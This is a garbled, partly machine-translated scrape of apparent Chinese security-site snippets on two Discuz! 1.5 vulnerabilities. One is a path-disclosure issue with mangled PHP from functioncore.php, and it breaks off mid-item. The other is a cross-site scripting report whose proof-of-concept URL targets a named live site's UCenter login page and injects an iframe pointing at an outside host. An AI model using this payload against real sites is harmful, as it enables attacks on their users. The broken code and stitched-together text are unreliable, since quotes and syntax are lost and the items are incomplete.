Discuz 1.5 storm WEB path vulnerability-vulnerability warning-the black bar safety net

Test environment: discuz X1. 5+nginx 1.0 漏洞 文件 source/function/functioncore.php that Code: $G'setting''domain''app''default' && $content = pregreplace"/a href="^"+"/e", "rewriteoutput'sitedefault', 0, '".$ G'setting''domain''app''default'.$ port.$ G'siteroot'."', '\\1'", $content; Use code:...

Discuz! 1.5 跨站脚本攻击

简要描述： UC登陆页面存在跨站漏洞 详细说明： http://www.eisdl.com/bbs/ucserver/admin.php?m=user&a=login&iframe=&sid='%22%3E%3Ciframe%20src=http://www.pker.in%3E 漏洞证明： http://www.eisdl.com/bbs/ucserver/admin.php?m=user&a=login&iframe=&sid='%22%3E%3Ciframe%20src=http://www.pker.in%3E...